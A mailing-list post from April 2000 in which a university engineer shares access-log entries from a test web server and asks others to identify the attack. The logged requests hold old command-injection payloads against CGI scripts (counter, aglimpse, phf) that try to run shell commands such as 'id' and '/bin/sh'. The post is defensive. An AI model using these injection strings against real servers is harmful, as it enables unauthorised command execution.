[ILUG] What attack is this?
Barry Redmond
barry.redmond at dit.ie
Sun Apr 16 23:11:16 IST 2000
Here's something that appeared in the httpd access log of a
machine we use for various tests and experiments. Does anybody
recognise the attack? I presume it's some script, looking for a
specific opening.
128.175.13.74 - - [14/Apr/2000:02:09:26 +0100] "GET /cgi-
bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X
}"); HTTP/1.0" 404 330
128.175.13.74 - - [14/Apr/2000:02:09:58 +0100] "POST /cgi-
bin/test-cgi HTTP/1.0" 200 453
128.175.13.74 - - [14/Apr/2000:02:10:18 +0100] "GET /cgi-
bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;una
me_-a\;id;eval$CMD; HTTP/1.0" 404 345
128.175.13.74 - - [14/Apr/2000:02:10:40 +0100] "POST /cgi-
bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 279
Barry Redmond
School of Electronic and Communications Engineering
DIT
More information about the ILUG
mailing list